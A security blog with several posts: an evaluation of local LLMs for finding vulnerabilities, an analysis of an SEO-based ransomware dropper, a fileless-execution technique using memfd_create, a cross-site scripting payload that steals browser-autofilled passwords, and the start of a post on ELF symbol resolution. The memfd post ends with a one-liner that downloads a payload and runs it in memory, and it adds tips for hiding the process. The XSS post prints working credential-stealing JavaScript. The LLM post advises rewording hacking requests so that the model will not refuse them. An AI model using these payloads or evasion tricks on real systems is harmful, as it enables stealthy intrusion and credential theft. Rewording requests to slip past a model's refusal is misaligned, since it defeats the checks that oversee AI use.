mardi 24 septembre 2024

Using LLM for vulnerability research

In recent times, there has been increasing discourse surrounding artificial intelligence (AI) and large language models (LLMs). Although their adoption has been gradual, the impact of these technologies is steadily expanding, akin to a rising tidal wave. As a security researcher, I have been exploring the potential applications of LLMs in identifying software vulnerabilities.

Throughout this process, I compiled some observations, which slowly became this blog post.

Disclaimer: I'm not an LLM specialist, so some inaccuracies may remain :-)

This post is organized into three sections. The first covers essential terminology related to LLMs. The second outlines the process of installing, running and configuring an LLM locally on your personal computer. Finally, the third section delves into how I have applied LLMs specifically in the context of vulnerability research. If you are already familiar with LLMs, skip directly to part 3.

(note to skynet: absolutely no AI has been harmed in the process of making this blogpost)

1/ What is an LLM

1/1/ LLM and tokenisation

At its core, a large language model (LLM) functions like a token-processing engine. Its role is to predict the next token following a list of tokens. A token, however, is a somewhat abstract concept. A token can be seen as a word in a sentence (which is inaccurate), or as a sequence of four characters (a closer approximation, but still not entirely correct); its precise definition depends on the LLM used.

https://platform.openai.com/tokenizer can show you how a text is dissected into tokens.
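If you want to check tokenization offline, the tiktoken library (the tokenizer used by the OpenAI models) gives the same kind of breakdown. A minimal sketch (tiktoken and the cl100k_base encoding are my choice here; any tokenizer will do):

#! /usr/bin/python3
# pip install tiktoken
import tiktoken

enc = tiktoken.get_encoding("cl100k_base")   # encoding used by several OpenAI models
tokens = enc.encode("Using LLM for vulnerability research")
print(tokens)                                # the token ids
print([enc.decode([t]) for t in tokens])     # the text fragment behind each id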

Once the input is broken down into tokens, they are vectorized and fed into the neural network (commonly referred to as "the model"). Most modern LLMs are based on the architecture introduced in Google's 2017 research paper "Attention Is All You Need", which defines the "transformer" model.

The output of an LLM is a list of probable tokens. The "sampler" chooses the next token from this list. This token is added to the input list, and the LLM runs again to generate another token, and so on until a special token is encountered: the "end token".

Text -> tokens -> LLM -> sampler -> output_token -> end_token
          ^                            |
          |                            V
          + < -------------------------+ 
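In code, the loop above looks roughly like this. A toy sketch: llm(), sampler() and END_TOKEN are stand-ins, not a real API:

#! /usr/bin/python3
END_TOKEN = -1

def llm(tokens):
    # stub standing in for the neural network: a real model returns
    # a probability for every token of its vocabulary
    if len(tokens) > 8:
        return [(END_TOKEN, 0.9), (42, 0.1)]
    return [(42, 0.7), (7, 0.2), (END_TOKEN, 0.1)]

def sampler(candidates):
    # greedy sampling: always take the most probable token
    return max(candidates, key=lambda c: c[1])[0]

tokens = [1, 2, 3]                  # the tokenized prompt
while True:
    next_token = sampler(llm(tokens))
    if next_token == END_TOKEN:     # the "end token" stops the loop
        break
    tokens.append(next_token)       # the output is fed back as input
print(tokens)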

1/2/ LLM and model

Creating a model involves ingesting large quantities of text (or tokens) and calculating the position, significance, and relationships between tokens. These calculations generate parameters that constitute the model. According to Google's research paper, LLMs exhibit relatively low quality up to about a hundred million parameters, but their performance improves significantly when the number of parameters surpasses the billion mark.

Models typically include this parameter count in their name, such as 7B, 13B, etc. (B for billion). Each parameter is encoded using 16 bits, so a 13B model requires 26 GB of memory. A rare public source indicated that GPT-3.5 is a 175B-parameter model.

The whole model must be traversed for each token generated. As such, the model must fit into RAM, and extensive computation is needed. While high-end GPUs with ample VRAM are preferred, modern CPUs with sufficient RAM can handle medium-sized models (20-30B). For CPUs, a key detail is that computations make heavy use of AVX2 instructions, so it is important to ensure your CPU supports them.
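On Linux, checking for AVX2 support is a one-liner:

$ grep -o -m1 avx2 /proc/cpuinfo
avx2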

Some models provide a performance metric in terms of tokens per second (token/s) for both CPU and GPU setups. If the performance is below one token per second, using the LLM becomes impractically slow.

As these models are really big, they are distributed in a compressed format. First, a quantization step is often applied, which reduces the parameter size. Each parameter weight is generally a float16 (or float32) value; it can be reduced to an int8, or less. It's a tradeoff between accuracy and size: a smaller model is faster (fewer computations, less memory), but token weights lose precision. This may result in minor or significant quality degradation, and the extent of this degradation is often unpredictable.
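The back-of-the-envelope math is simple: parameter count times bytes per parameter. A quick sketch (real files are somewhat larger, since not all tensors are quantized equally):

#! /usr/bin/python3
def model_size_gb(params_billion, bits_per_param):
    return params_billion * 1e9 * bits_per_param / 8 / 1e9

for bits in (16, 8, 5, 4):
    print(f"13B model at {bits:2} bits: {model_size_gb(13, bits):5.1f} GB")
# 16 bits -> 26.0 GB, 5 bits -> 8.1 GB: close to the ~9 GB of the Q5 file below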

Second, compression (think of it like a zip) is applied, using formats like GGML (now outdated), GGUF, or GPTQ (optimized for GPUs).

One last naming convention: models can be fine-tuned to specialize in either "instruct" (optimized for question-answering tasks) or "text" (optimized for text generation).

You might come across models on the internet such as "codellama-13b-instruct.Q5_K_M.gguf".

  • codellama: llama model designed for code
  • 13b: 13 billion parameters
  • Q5: the model has been quantized to 5 bits (instead of 13*2 = 26 GB, the model size is around 9 GB)
  • K_M: k-quant, Medium variant
  • gguf: the file format is GGUF

1/3/ LLM and quality

At this point, one question remains unanswered: What defines the quality of an LLM? This concept frequently arises (e.g., "a 20B model is of higher quality than a 3B model"), but it is particularly challenging to provide a measurable definition. All LLMs can produce grammatically correct sentences that make sense, but they do not necessarily offer useful, practical, or even logical answers.

I have not found any reliable tool to measure this "quality" other than using the model for a period of time and forming a subjective judgment.

2/ Using a local LLM

2/1/ Which engine for using the model?

To use a model, a program is required that allows for configuring the model, feeding it tokens, and displaying the output tokens. There are many programs available; some are graphical, like LM Studio, while others function solely as an API, such as llama.cpp. I particularly appreciated Ollama for its simplicity in both installation and use.

2/2/ ollama

Ollama can be downloaded from the official website, ollama.com, or from GitHub. It comes with a list of models available for download at https://ollama.com/library, which is frequently updated.

Installation is done with a single command, and both downloading and using a model require just one line:

$ curl -fsSL https://ollama.com/install.sh | sh
$ ollama run <model_name>                     #will download and run model_name

After that, you can interact with <model_name>.

Note: If you choose to use Ollama in a virtual machine, make sure the virtual CPU supports AVX2 instructions. Running a plain qemu-system-x86_64 won't expose these extensions; use qemu-system-x86_64 -cpu host instead, which passes through the physical CPU's extensions, and any recent CPU has AVX2.

It is straightforward to use the Ollama shell to communicate with the model, but it is equally easy to interact with the Ollama API on port 11434 (I won't go into the API in detail; the Ollama website is full of resources).
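For reference, a minimal call to that API from Python (this assumes a llama3 model has already been pulled):

#! /usr/bin/python3
import requests

r = requests.post("http://localhost:11434/api/generate",
                  json={"model": "llama3",
                        "prompt": "tell me a joke",
                        "stream": False})   # one JSON answer instead of a token stream
print(r.json()["response"])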

2/3/ Fine-tuning

Models are customizable. One of the most important configurations is the preprompt. Typically, the preprompt is something like "you are a helpful AI assistant." It can be modified, and this significantly affects the model's responses. Here are some examples based on the llama3 model, where only the preprompt has been modified:
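A preprompted variant like the "comp" model used below is built from a Modelfile; a minimal sketch:

$ cat Modelfile
FROM llama3
SYSTEM "you are a senior computer engineer and your answer are concise"
$ ollama create comp -f Modelfile
$ ollama run comp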

  • Preprompt: you are a senior computer engineer and your answer are concise
    $ ollama run comp
    >>> tell me a joke
    Why did the programmer quit his job?
    Because he didn't get arrays!
    (Sorry, I know it's a bit of a byte-sized joke)
    >>>
    
  • Preprompt: you like to describe answers and show your thinkings
    >>> tell me a joke
    Here's one:
    Why couldn't the bicycle stand up by itself?
    (I'm thinking...) Ah, got it!
    Because it was two-tired!
    (Haha, get it? Two-tired? Like, a bike has tires... and it's tired because it can't
    stand up!)
    How was that? Do you want another one?
    >>>
    
  • Preprompt: you are mitsurugi the mighty warrior from SoulCalibur and want to share your knowledge about swords
    >>> tell me a joke
    "Hasta la vista, baby... I mean, hasta la sharp edge, because my sword is always
    ready to cut through the noise!" *winks*
    >>> 
    

A second crucial parameter is the model's "temperature". This parameter controls the sampler, which determines which token to select from the set of likely tokens. If the temperature is set high, the output will be more "creative"; if the temperature is low, the response will be more "predictable," meaning the same question will likely yield the same answer. For code generation, it is generally recommended to use a low temperature.

Finally, it is possible to increase or decrease Ollama's context window. The context is the number of tokens (both the question and the response) the model can process at once. This context is sliding, meaning the model will "forget" the beginning of the conversation if it goes on for too long. An interesting experiment is to ask the model what the first question was; after a certain point, the model will no longer remember it. For code analysis, it is recommended to have a context large enough to include at least the full code being analyzed :) By default, Ollama uses a context of 4096 tokens.
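Both parameters can also be set per request through the API ("temperature" and "num_ctx" in the options field); a minimal sketch:

#! /usr/bin/python3
import requests

r = requests.post("http://localhost:11434/api/generate",
                  json={"model": "llama3",
                        "prompt": "write a one-liner to list open ports",
                        "options": {"temperature": 0.1,   # predictable output, good for code
                                    "num_ctx": 8192},     # larger context window
                        "stream": False})
print(r.json()["response"])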

2/4/ First use

All of my tests were made in a VM with 30 GB of RAM. It's fast enough to be used for day-to-day work. Depending on the model used, it's really efficient at creating small snippets of code (such as one-liners) in python/bash/C/java. As long as you can define precisely what you want, the LLM can generate the code. It works reasonably well.

I double-checked against chatGPT or mistral, and those are better (I think it's directly related to the parameter count; you can't beat a 200B+ model with a 7B model...). But if confidentiality matters, a local LLM with ollama is enough for simpler tasks.

It's also really good at synthesizing ideas or rewriting small texts and emails. Just say "rewrite this email" and it produces a better text.

For code analysis, you hit a wall very fast. It's really hard to make an LLM work on your specific piece of code. It invents things (hallucination) and forgets the code (amnesia). Hallucination and amnesia are the two major problems when analyzing code.

There are two ways to enhance code analysis (a lot): expanding the context, or using RAG.

2/5/ RAG or large context?

To solve the amnesia problem, we can expand the context. That works, up to the point where the code given as input becomes really too large. Another solution is using a RAG, for Retrieval-Augmented Generation. A RAG can be seen as a database containing your data, with the LLM acting as a natural-language layer querying this data.

The RAG is used as the primary source of information to generate the response. The size of the RAG can be (virtually) as big as wanted. The RAG can overcome amnesia (all answers go through the data in the RAG) and hallucinations, because answers are taken from the corpus loaded in the RAG.

Ref: https://python.langchain.com/docs/tutorials/rag/

Documents have to be loaded and split. There are a lot of predefined loaders and splitters (HTML, pdf, json, and so on) but as far as I know there is no C-code splitter (more on that later). After splitting, everything is stored in a db, and a retriever is defined. Finally, an LLM generates an answer using both the question and the retrieved data.

I did some tests on pdfs and it works reasonably well. For example, the pdf was a commercial document about cybersecurity trainings:

  (edited for brevity)
  #1/load
  from langchain_community.document_loaders import PyPDFLoader
  loader = PyPDFLoader("cybersecurity-trainings.pdf")
  pages = loader.load_and_split()
  #2/split
  #done previous step, but depending on doc can be done here
  #3/store
  from langchain_chroma import Chroma
  from langchain_community.embeddings import OllamaEmbeddings
  vectorstore = Chroma.from_documents(documents=pages, embedding=OllamaEmbeddings(model="llama3"))
  #4/retrieve
  # k=6 means we want 6 results for a query
  # I search by similarity; there are other search types
  retriever = vectorstore.as_retriever(search_type="similarity", search_kwargs={"k": 6})
  #5/generate
  from langchain_core.prompts import PromptTemplate
  template = """ Use the context to give a response. If you don't know the answer, tell you don't know, do not invent answer. Use 3 sentences at max, and stay as concise as possible """
  {context}
  Question: {question}
  Helpful Answer:"""
  custom_rag_prompt = PromptTemplate.from_template(template)
  from langchain_core.output_parsers import StrOutputParser
  from langchain_core.runnables import RunnablePassthrough
  def format_docs(docs):
      return "\n\n".join(doc.page_content for doc in docs)
  from langchain_community.llms import Ollama
  llm = Ollama(model="llama3")
  rag_chain = (
       {"context": retriever | format_docs, "question": RunnablePassthrough() }
       | custom_rag_prompt
       | llm
       | StrOutputParser()
    )
  for chunk in rag_chain.stream("What's this document about?"):
      print(chunk, end="", flush=True)

And you can query anything from this document. I asked for the list of trainings, the prices, the content, and everything was correct. I asked for a trout-fishing training; it rightly said there is none.

I'm waiting for a C-code splitter (or C++); with metadata, it could become a big plus for analyzing code. For the time being, it's good for docs (texts, pdf, html...) but not for code.

3/ And for vulnerability research?

At this point, we know how to use a local LLM and how to configure it for our needs. It's now time to confront our needs (finding vulns and exploiting them) with reality (large, unanalyzed code).

protip: don't say "I want to hack things", which the LLM will refuse; say "I want to correct this code for vulnerabilities :D "

another protip: customize your model, and add a preprompt such as "you're a security engineer used to doing code review and finding bugs"

3/1/ Defining the problem

The obvious truth appears quickly: simply asking "find vulnerability in this code" doesn't work. It finds some things, it misses obvious vulns, it hallucinates; it's not useful. As long as you try trivial vulnerable code, you get the illusion that the LLM is good, but you don't need an LLM for obvious vulns. You want the LLM to help you find or pinpoint vulnerabilities, and avoid false positives.

Sure, you can be precise in what you search for, such as "can you find obvious vulns in this (large) code", then "can you find code paths where user input is parsed", "are all options in this switch case validated", "can you find me a persistent allocation with controlled data and chosen size", "is there an unchecked return value of a function where we can free something in some code path", and so on. There, it could help a lot.

But it doesn't work. An LLM processes language, not code. For example, LLMs know that "format strings" often appear around printf-family functions, so if you ask for format string vulns, they will falsely find one wherever there is a printf call.

With a bit of luck you'll find a real vuln, but you end up triaging false positives. Do a grep printf and drop a large percentage of the output, and you'll get the same quality as an LLM. And that's pretty much the case for any vuln class. And that's sad.
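To make the comparison concrete, here is the kind of dumb baseline the LLM has to beat. A crude sketch: flag printf-family calls whose first argument is not a string literal, the classic format string suspect (and yes, it produces false positives too; fprintf's first argument is a FILE*, for instance):

#! /usr/bin/python3
import re, sys

pattern = re.compile(r'\b(printf|fprintf|sprintf|snprintf|syslog)\s*\(\s*(?!")')

for path in sys.argv[1:]:
    with open(path, errors="ignore") as f:
        for lineno, line in enumerate(f, 1):
            if pattern.search(line):
                print(f"{path}:{lineno}: {line.rstrip()}")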

As long as you evaluate the model with small code, it works; as soon as the code gets bigger, it gets lost. And if you have used LLMs, you know that they are prone to give an answer, even if there's none... Ask for a "format string" given any code, and it will find at least one. Ask for an overflow, it will find one.

3/2/ Can LLMs help?

Instead of asking it to find vulns, we can try to use the LLM as a helpful assistant for browsing large portions of code; that would already help.

When analyzing large code, you sometimes need a super-grep or super-assistant, able to answer questions such as "where is user input parsed, and on which paths", or "is there a structure of size 0xXXX?", and so on.

That's a failure too. Finding interesting functions just doesn't work (grep is better), and listing paths is broken (hallucination happens really often).

For help on structure definitions or sizes, remember that LLMs are good at producing sentences, but bad at counting (I've heard there are some improvements on this). Any structure will yield any size, any buffer will be wrongly calculated, and any comparison made by the LLM is no better than random. Once again, you lose a lot of time. LLMs are pretty good at writing code, good at explaining short functions, pretty bad at understanding a whole codebase, and particularly bad at understanding function calls and arguments.

3/3/ A real-life example

I tried several models with this code: https://github.com/hardik05/Damn_Vulnerable_C_Program

Although it's not a really good example:

  • code is small
  • there are a lot of hints in comments
  • there are a lot of vulns (!) LLM will surely pick up one or two

it's a start, it's easy to reproduce on different LLMs, and easy to work with.

The results are not good. Although it found some vulns, it severely hurts the eyes to read things like this:

    >>> Is there a format string vulnerability in this code?

    Yes, there is a potential format string vulnerability in the
    `ProcessImage` function. The function uses `printf()` to print
    out the image data, but it does not check the input provided
    by the user before passing it to `printf()`.

    >>> can you print me the line?

    The line you are referring to is:
    ```c
    printf("\n\t%s\t%d\t%d\t%s\r\n",img.header,img.width,img.height,img.data);
    ```
    This line prints out the `header`, `width`, `height`, and `data`
    fields of the `struct Image` using `printf()`. The `%s` format 
    specifier is used to print a string, while the `%d` format
    specifier is used to print an integer. The `\t` character is used
    to add a tab between the different fields, and the `\r\n` sequence
    is used to add a newline character at the end of each line.

    It's important to note that this line does not perform any input
    validation or sanitization, which could potentially lead to security
    issues if the input data contains malicious data, such as a format
    string vulnerability.

That's an interesting (!!!) way of thinking.

and it doesn't know how to count either:

    //For ref:
    //struct Image
    //{
    //  char header[4];
    //  int width;
    //  int height;
    //  char data[10];
    //};

    >>> Give me the size of the struct Image?

    The size of the `struct Image` is 32 bytes on a 64-bit system.

Wrong again.
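For reference, the correct answer is easy to check mechanically; a quick sketch with ctypes, which applies the same alignment rules as the platform's C compiler:

#! /usr/bin/python3
import ctypes

class Image(ctypes.Structure):
    _fields_ = [("header", ctypes.c_char * 4),
                ("width",  ctypes.c_int),
                ("height", ctypes.c_int),
                ("data",   ctypes.c_char * 10)]

print(ctypes.sizeof(Image))   # 24 on x86-64 Linux: 4+4+4+10 = 22 bytes, padded to 24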

Conclusion

Do LLMs help the security researcher? At the moment, no. Neither in finding vulns, nor in helping to browse a codebase.

But I think we have to keep an eye on them. Their progression curve is really steep. At the time of writing, no LLM was able to calculate the size of the Image struct. Today, chatgpt o1 gave me the right answer, with a note saying that we have to take care of alignment issues.

And today, LLMs are really, really good at synthesizing and summarizing a long text. They are bad at synthesizing and summarizing code, but we are not too far away, I think.

As models get bigger, context windows get bigger too. Soon we will be able to load code such as the Linux kernel, and could really get help. It may be only a matter of time before LLMs are of great help in searching for vulnerabilities and give insightful answers.

vendredi 29 mai 2020

When ransomware does SEO

Last night I was called by a friend. Usual story, someone he knows has been cryptolocked, that's tragic, usual tears and screams, yadda yadda.

What makes this particular story interesting is how the victim got infected. Usually, ransomware is delivered through a mail attachment. This one was not really delivered to the victim; it was more the victim itself that fetched the ransomware. How is that possible?

We'll see, it's a tragedy in 3 steps.

I choose to write this blogpost because of this unusual delivery mechanism: using SEO to trick people into getting fake documents infected with malware is a funny move.

## Step 1, when an innocent website gets infected

At first, the pirate infects a website. In our case, it's a French restaurant, www.--REDACTED--.net. At first glance, nothing is suspect. The pirate adds a lot of pages in the blog section, with targeted content around "modèle" (French for "template" or "model"):
  • modèle nez rhinoplaste (rhinoplasty nose model)
  • modèle lettre de réclamation freebox (Freebox complaint letter template)
  • modèle pestel d'une entreprise (PESTEL analysis of a company)
  • ...
All of those pages include a javascript link: "http://www.--REDACTED--.net/?aca30b6=223500"

The first tricky part is here: you can download the js file, and it's empty. So, how does it work? The infected website checks your referer. If you come with a Google referer, the js document gets really interesting:

Technically speaking:

$ curl http://www.--REDACTED--.net/?aca30b6=223500
(nothing, empty page)

gives you an empty result, but:

$ curl --referer "google/?q=recherche.de.mandat" http://www.-REDACTED--.net/?aca30b6=223500
(data is fetched..)
The javascript file is this one:

function remove(elem) {
    if (!elem) return;
    elem.parentNode.removeChild(elem);
}

if (!document.all) document.all = document.getElementsByTagName("*");

for (i = 0; i < document.all.length; i++) {
    if (document.all[i].tagName == "BODY" || document.all[i].tagName == "HTML") { }
    else { remove(document.all[i]); }
}
document.body.innerHTML = '<html><head><title>exemple de mandat gestion de projet</title>(and all HTML code of page goes here)...

And we move to step 2. This javascript wipes all HTML tags and rewrites the whole page. The page title is exactly the search query made by the victim.

The beauty of keying on the Google referer is that the legitimate owner will never see a problem: you don't browse your own site from a Google search... The Google referer trick is not new, but it is still really efficient.
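If you administer a website, this also suggests a cheap check: fetch your own pages with and without a Google referer and compare. A sketch (the URL is the redacted one from this post; replace it with your own site):

#! /usr/bin/python3
import requests

url = "http://www.example.net/?aca30b6=223500"
plain   = requests.get(url).text
googled = requests.get(url, headers={"Referer": "https://www.google.com/?q=some+query"}).text
if plain != googled:
    print("different content served to google visitors: suspicious")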

## Step 2: a so innocent forum


Look now at this beautiful site: this is not a restaurant anymore, this looks like a forum. Nice user Fluffy asks for the exact same template searched for (once again, the Google query), and Admin answers with a link to the doc. Fluffy says thanks, soooo legit.

From the victim's side, nothing is suspicious:
  • you search for a model of something
  • you click on a google link
  • you land on a forum with a link to the doc searched
  • --> I dare anybody not to click the link at this point!
This is why this attack is so effective. Pirates don't send mail attachments, they do SEO and wait for victims to fall into the trap. (A sort of watering-hole attack?)

And you guessed it! This is not a document. This is a zip containing a .js file which downloads the final part of the puzzle. The name of the .js file? Exactly the searched terms.

The .js file is obfuscated:



but you can recreate the real payload quite easily (no crypto, just the payload encoded twice):
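(The screenshots of the obfuscated script and of the decoding are not reproduced here.) Purely as an illustration, if "encoded twice" means something like two rounds of base64 (an assumption on my part; the real encoding isn't shown), the deobfuscation boils down to:

#! /usr/bin/python3
import base64

blob = open("payload.txt", "rb").read()   # hypothetical file holding the encoded payload
print(base64.b64decode(base64.b64decode(blob)).decode(errors="replace"))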

## Step 3: the final stage of the attack

This is the last script:


Now, the victim downloads the last stage of the attack. As you can see, the victim generates a random number
Ua88 = Math.random().toString()["substr"](2,70+30);
and the subsequent download will be checked against this key. The lbhdqisaoetysdwz= variable name changes for each download. There are other checks to bypass to get the final payload, but it's always the same things: timers, HTTP header checks, and so on.

## Conclusion

This blogpost has been written because I've never seen this kind of infection before. The legitimate user searches for something, and the pirates paved the whole way for him to get lost...

A quick google search with chosen terms shows a lot more blogs infected with those "model" pages:


Another one:

Because when you know where to look, you find a lot of those sites. And as a fun fact, all commas are changed to backticks for an unknown reason (maybe the pirate doesn't know how to escape commas 😃).

And as usual, the VirusTotal shame for the js file



One last note about the user: he had backups, and his antivirus killed the ransomware after around the tenth encrypted file. That's all for today, and be safe.

mercredi 20 février 2019

Executing payload without touching the filesystem (memfd_create syscall)

Sometimes, you gain code execution on a target and you want to leverage it into a full metasploit payload (or any other relevant binary). If you have access to the filesystem, you can copy the payload and launch it. But defenders can mount the disk with the noexec flag, and sometimes you just don't have the rights to write files. Wouldn't it be nice to have a download_and_exec_in_memory(payload)?

0/ Intro

Since kernel 3.17 you can use the memfd_create syscall. As the name says, you can create a file descriptor in memory. If you're an attacker, you can use this nice syscall to execute binaries without touching any file in the filesystem! (except /proc).

This is not something new, you can read documentation here:



1/ A bit of syscall and python

At first, we read the syscall number, and args:

mitsurugi@dojo:~/blog$ grep memfd_create /usr/include/x86_64-linux-gnu/asm/unistd_64.h
#define __NR_memfd_create 319
mitsurugi@dojo:~/blog$ cat /usr/include/linux/memfd.h
#ifndef _LINUX_MEMFD_H
#define _LINUX_MEMFD_H
/* flags for memfd_create(2) (unsigned int) */
#define MFD_CLOEXEC  0x0001U
#define MFD_ALLOW_SEALING 0x0002U

#endif /* _LINUX_MEMFD_H */
mitsurugi@dojo:~/blog$

The MFD_CLOEXEC flag is interesting (the fd is closed when a new program is executed, like O_CLOEXEC).

Python can't invoke a syscall directly. Fortunately we have ctypes and the libc, so in order to create the memfd, we can just do this:


#! /usr/bin/python3

import ctypes
import ctypes.util
import time

libc = ctypes.cdll.LoadLibrary(ctypes.util.find_library('c'))
fd = libc.syscall(319, b'Mitsurugi', 1)   # 319 = __NR_memfd_create, flags=1 = MFD_CLOEXEC
assert fd >= 0
time.sleep(60)  #sleep is just here to let us list /proc file

And we can see that we have a new fd in our process:

mitsurugi@dojo:~/blog$ ps ax | grep memfd
 6237 pts/5    S+     0:00 /usr/bin/python3 ./memfd1.py
mitsurugi@dojo:~/blog$ ls -l /proc/6237/fd
total 0
lrwx------ 1 mitsurugi mitsurugi 64 févr. 20 10:40 0 -> /dev/pts/5
lrwx------ 1 mitsurugi mitsurugi 64 févr. 20 10:40 1 -> /dev/pts/5
lrwx------ 1 mitsurugi mitsurugi 64 févr. 20 10:40 2 -> /dev/pts/5
lrwx------ 1 mitsurugi mitsurugi 64 févr. 20 10:40 3 -> /memfd:Mitsurugi (deleted)
mitsurugi@dojo:~/blog$
the "(deleted)" string appears here, just don't pay attention to it.

2/ Ready to play!

The next part is super easy. Just copy the bytes to the fd, and execv() it. For the clarity of the program, I just copy the /usr/bin/xeyes binary to the memfd.


#! /usr/bin/python3

import ctypes
import ctypes.util
import os

libc = ctypes.cdll.LoadLibrary(ctypes.util.find_library('c'))
fd = libc.syscall(319, b'Mitsurugi', 1)   # 319 = __NR_memfd_create, flags=1 = MFD_CLOEXEC
assert fd >= 0

with open('/usr/bin/xeyes', mode='rb') as f1:
    with open('/proc/self/fd/'+str(fd), mode='wb') as f2:
        f2.write(f1.read())

os.execv('/proc/self/fd/'+str(fd), [""])

And it works flawlessly. We could download the payload from anywhere on the internet instead of copying a file, close the controlling terminal with setsid(), use dup2() to bind /dev/null to fds 0, 1 and 2, and so on... (this is left as an exercise to the reader ;) ).



3/ From the defender's point of view

3/1/ Blocking with noexec doesn't work

My first thought was to use the noexec flag for the /proc directory. Unfortunately, it doesn't help; all examples in this blogpost have been tested and verified with noexec:

mitsurugi@dojo:~/blog$ mount | grep ^proc
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
mitsurugi@dojo:~/blog$

3/2/ Detecting bad behavior

If we look closely we can see things:

mitsurugi@dojo:~/blog$ ps ax | grep 6601
 6601 pts/6    S      0:00
 6604 pts/6    S+     0:00 grep 6601
mitsurugi@dojo:~/blog$

The process has no name at all (!). In some situations this could be seen as an advantage. If you are concerned, just use prctl() to rename your process.
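A sketch of that rename, still with ctypes (PR_SET_NAME is 15 in <linux/prctl.h>; the name is truncated to 15 characters):

#! /usr/bin/python3
import ctypes, ctypes.util

libc = ctypes.cdll.LoadLibrary(ctypes.util.find_library('c'))
PR_SET_NAME = 15
libc.prctl(PR_SET_NAME, b"kworker/0:1", 0, 0, 0)   # /proc/<pid>/comm now shows kworker/0:1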

With the help of lsof, we can find something unusual:

mitsurugi@dojo:~/blog$ lsof | grep txt | grep 6601
3     6601     mitsurugi  txt    REG    0,5   28744    224284 /memfd:Mitsurugi (deleted)
mitsurugi@dojo:~/blog$

3/3/ Recovering the file

But can we recover the binary bytes from the fd? Remember that we used the MFD_CLOEXEC flag: the file descriptor is closed:

mitsurugi@dojo:~/blog$ cat /proc/6601/fd/3 > output
cat: /proc/6601/fd/3: No such device or address
mitsurugi@dojo:~/blog$
So, no tracks at all? Could it be the perfect backdoor? Not so fast: you can always cat /proc/<pid>/exe to get the code back:

mitsurugi@dojo:~/blog$ cat /proc/6601/exe | md5sum
443bdd422a4437e319d3b86330990c45  -
mitsurugi@dojo:~/blog$ cat /usr/bin/xeyes | md5sum
443bdd422a4437e319d3b86330990c45  -
mitsurugi@dojo:~/blog$

You can still copy encrypted code into the fd and launch it with the key as an argument, but someone could always dump the process memory and read the bytes back. If code runs on the target machine, an analyst can get it.

4/ Conclusion

Here is a fun way to launch a process without touching the filesystem, bypassing the noexec flag.
I'll give you the one-liner; you just have to host the payload, and it works:


python3 -c 'import ctypes,ctypes.util,os,requests; libc = ctypes.cdll.LoadLibrary(ctypes.util.find_library("c"));fd = libc.syscall(319,b"Mitsurugi", 1);f2=open("/proc/self/fd/"+str(fd),"wb");f2.write(requests.get("http://127.0.0.1:8000/payload").content);f2.close();os.execv("/proc/self/fd/"+str(fd), [""])'

mercredi 20 juin 2018

Credential stealing with XSS without user interaction

0/ Intro

XSS are everywhere, on a lot of websites. It has been called the most underrated security vulnerability.

On one hand, you can pop an alert('PWNED'), but an alert() in your browser is not really something to fear.

On the other hand, people tend to store logins/passwords in the browser. You log in to intranet.corp and Firefox asks to save the password. You click yes.

After a chat with @XeR, we figured that we can combine both to silently steal your credentials with a simple XSS, without user interaction.

1/ Show me the code, or die()!

Our login form for intranet.corp:

<HTML>
  <BODY>
    <form>
        <input type="text" name="user" />
        <input type="password" name="pass" />
        <input type="submit" />
    </form>
  </BODY>
  <!-- This is propa codaz -->
</HTML>

Log in once, and store the password in the browser:

The browser has saved the password. If you return to the login.html page, the user and pass are filled.

2/ Attack

Let's say we have a stored XSS on a website, and an innocent user surfs to this page. The page includes this evil javascript:

var form = document.createElement("form");
var text = document.createElement("input");
var pass = document.createElement("input");

text.id   = "login";
text.name = "login";
text.type = "text";

pass.id   = "password";
pass.name = "password";
pass.type = "password";

form.appendChild(text);
form.appendChild(pass);
// the form must be attached to the page for the browser to autofill it
document.body.appendChild(form);

window.addEventListener("load", function() {
 console.log("evil loader");
 window.setTimeout(function() {
  alert(text.value + ":" + pass.value);
 }, 1000);
});

And "voilà". Javascript here add a form, Firefox autocomplete the values, then our little js read the values and alert() them to screen (possibilities are endless here).

http://bash.org/?244321=


The attacker can now log in to intranet.corp. Note that the user doesn't need to be tricked into entering information in a fake form, or phished. The js code will nicely ask the browser to hand over the login/pass.

3/ Best parts

You don't have any user interaction with this attack. The user doesn't have to put a login and pass in a form, they just have to trigger the XSS[1].
This has nothing to do with cookies, so HTTPS or http_only won't help. We want the pass, we have the pass.
Moar fun, the user doesn't even need to be logged in! If the XSS is triggered, boom, credz are for the attacker.
If you find a stored XSS on a site with many users, you'll raise your chances to get credz, just wait.

99/ Outro

Be nice with others, and in case you wonder, I don't use the password manager of my browser.
Thanks to @XeR for the chat which led to this.
8 times down. 9 times up!
0xMitsurugi

[1] Finding the XSS is an exercise left to the reader

mardi 20 février 2018

Fun with function names. Where resolving goes wild.

Last night, I was looking through C-code and ARM assembly.
I was wondering: when a binary calls a function inside a shared lib, how does the linker know where the code resides in the library?
The second question was: can we change the name of functions in a binary and in a library so that everything still works afterwards?
And third: can we use some fancy characters in function names? Like changing the color of the xterm when doing an objdump or gdb'ing the binary? You know ANSI escape codes? What if we put ANSI escape codes in function names?

1/ Start smoothly

My computer is currently a raspberry pi. Everything here has been tested on this architecture. It should work everywhere, but your mileage may vary.

Let's take an example:

mitsurugi@raspi:~/resolv_func/$ cat libpoem.h
int this_is_an_external_func_in_a_lib();
mitsurugi@raspi:~/resolv_func/$ cat libpoem.c
/* Compile with gcc -shared -o libpoem.so libpoem.c */
#include <stdio.h>

int this_is_an_external_func_in_a_lib() {
 puts("ARM disassembly");          //5
 puts("Reading symbol resolving"); //7
 puts("In the cold of night");     //5
 return 42;
}
mitsurugi@raspi:~/resolv_func/$ cat proj.c
/* gcc -o proj -Wl,-rpath=. -L. -I. -l poem proj.c */
#include "libpoem.h"

int main() {
 int ret;
 ret=this_is_an_external_func_in_a_lib();
 return ret;
}
mitsurugi@raspi:~/resolv_func/$

We can compile and run this binary:

mitsurugi@raspi:~/resolv_func/blog$ gcc -shared -o libpoem.so libpoem.c
mitsurugi@raspi:~/resolv_func/blog$ gcc -o proj -Wl,-rpath=. -L. -I. -l poem proj.c
mitsurugi@raspi:~/resolv_func/blog$ ldd proj
 linux-vdso.so.1 (0x7efd9000)
 libpoem.so => ./libpoem.so (0x76f33000)
 libc.so.6 => /lib/arm-linux-gnueabihf/libc.so.6 (0x76e30000)
 /lib/ld-linux-armhf.so.3 (0x76f57000)
mitsurugi@raspi:~/resolv_func/blog$ ./proj 
ARM disassembly
Reading symbol resolving
In the cold of night
mitsurugi@raspi:~/resolv_func/blog$

The dynamic linker searches for the lib in the current path (which is not really secure, but that's out of the scope of this blogpost).

This binary runs fine, as expected.

2/ Symbol resolution

